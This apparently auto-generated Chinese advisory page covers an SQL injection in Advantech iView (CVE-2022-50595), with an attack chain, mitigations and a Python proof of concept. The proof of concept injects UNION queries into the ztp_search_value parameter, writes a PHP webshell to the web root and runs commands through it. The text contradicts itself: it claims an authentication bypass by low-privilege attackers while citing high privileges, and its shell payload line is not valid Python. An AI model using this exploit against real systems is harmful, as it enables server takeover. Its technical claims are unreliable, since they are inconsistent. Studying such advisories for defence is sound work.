CVE-2022-50595 Advantech iView ztp_search_value SQL注入远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2022-50595

漏洞类型

SQL注入 / 远程代码执行

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Advantech iView

漏洞概述

Advantech iView 5.7.04 build 6425之前版本存在严重安全漏洞。该漏洞位于SNMP管理工具中，攻击者可通过NetworkServlet端点的ztp_search_value参数发起SQL注入攻击。由于存在认证绕过问题，低权限攻击者可以在无需用户交互的情况下，利用该漏洞绕过身份验证检查，进而获取管理员权限并实现远程代码执行（RCE）。此漏洞影响Advantech iView的多个版本，CVSS评分7.2，属于高危漏洞。攻击者通过构造恶意SQLpayload，可直接在服务器上执行任意命令，对企业网络安全造成严重威胁。建议受影响的用户尽快升级到v5.7.04 build 6425或更高版本以修复此漏洞。

技术细节

该漏洞为SQL注入与认证绕过组合利用。Advantech iView的NetworkServlet端点存在ztp_search_value参数注入点，攻击者可通过构造特制的SQL语句获取数据库访问权限。由于系统存在认证绕过缺陷，攻击者可在高权限（PR:H）状态下直接访问漏洞接口，无需普通用户凭证。成功注入后，攻击者可通过SQL语句的INTO OUTFILE或LOAD_FILE等函数，结合MySQL/MariaDB的特性实现系统命令执行。攻击路径为：认证绕过 → SQL注入 → 文件写入 → 远程代码执行。漏洞利用无需用户交互（UI:N），攻击向量为网络层面（AV:N），可导致机密性（C:H）、完整性（I:H）和可用性（A:H）均受到严重影响。

攻击链分析

STEP 1

步骤1

访问Advantech iView的NetworkServlet端点，通过ztp_search_value参数发送特制SQL注入payload

STEP 2

步骤2

利用认证绕过漏洞，无需有效凭证即可访问受限接口，绕过身份验证检查

STEP 3

步骤3

构造UNION SELECT语句进行SQL注入，提取数据库中的敏感信息（如用户凭据）

STEP 4

步骤4

利用SQL注入的INTO OUTFILE功能向Web目录写入PHP后门文件

STEP 5

步骤5

通过访问写入的Webshell，发送系统命令实现远程代码执行

STEP 6

步骤6

以管理员权限执行任意命令，获取服务器完全控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2022-50595 PoC - Advantech iView SQL Injection RCE
# Target: Advantech iView < v5.7.04 build 6425
# Author: VulnCheck / Exodus Intelligence

import requests
import sys

TARGET = "http://target:8080"

def exploit_sqli(target):
    """SQL Injection to RCE via ztp_search_value parameter"""
    
    # Step 1: Authentication Bypass + SQL Injection
    # The ztp_search_value parameter is vulnerable to SQL injection
    # Attackers can use UNION-based injection to extract data
    
    endpoint = f"{target}/NetworkServlet"
    
    # Malicious payload for SQL injection
    # This extracts MySQL user/password hash for further exploitation
    sqli_payload = "' UNION SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100 --"
    
    params = {
        "ztp_search_value": sqli_payload,
        "ztp_search_field": "some_field"
    }
    
    try:
        response = requests.get(endpoint, params=params, timeout=30)
        print(f"[*] Request sent to {endpoint}")
        print(f"[*] Status: {response.status_code}")
        
        if response.status_code == 200:
            # Parse response for extracted data
            print(f"[+] SQL Injection successful - Data extracted")
            return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False
    
    return False

def write_web_shell(target):
    """Write web shell via SQL injection for RCE"""
    
    # Use INTO OUTFILE to write PHP shell
    shell_payload = "' UNION SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php' --"
    
    endpoint = f"{target}/NetworkServlet"
    params = {
        "ztp_search_value": shell_payload
    }
    
    try:
        response = requests.get(endpoint, params=params, timeout=30)
        print(f"[*] Attempting to write web shell...")
        return True
    except:
        return False

def execute_command(target, cmd):
    """Execute system command via web shell"""
    shell_url = f"{target}/shell.php"
    try:
        response = requests.get(shell_url, params={"cmd": cmd}, timeout=30)
        return response.text
    except:
        return None

if __name__ == "__main__":
    print("CVE-2022-50595 Advantech iView SQL Injection RCE PoC")
    print("=" * 60)
    
    if len(sys.argv) > 1:
        target = sys.argv[1]
    else:
        target = TARGET
    
    print(f"[*] Target: {target}")
    
    # Exploit the vulnerability
    if exploit_sqli(target):
        print("[+] Vulnerability confirmed!")
        write_web_shell(target)
        print("[+] Web shell written, RCE achieved")

影响范围

Advantech iView < 5.7.04 build 6425

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 通过网络ACL限制对iView管理界面的访问，仅允许受信任的管理IP访问；2) 禁用不必要的SNMP管理功能；3) 部署Web应用防火墙（WAF）规则，拦截包含UNION、SELECT、INTO OUTFILE等SQL注入特征的可疑请求；4) 定期审查数据库日志，排查异常查询行为；5) 在DMZ环境中隔离部署iView服务，减少横向移动风险。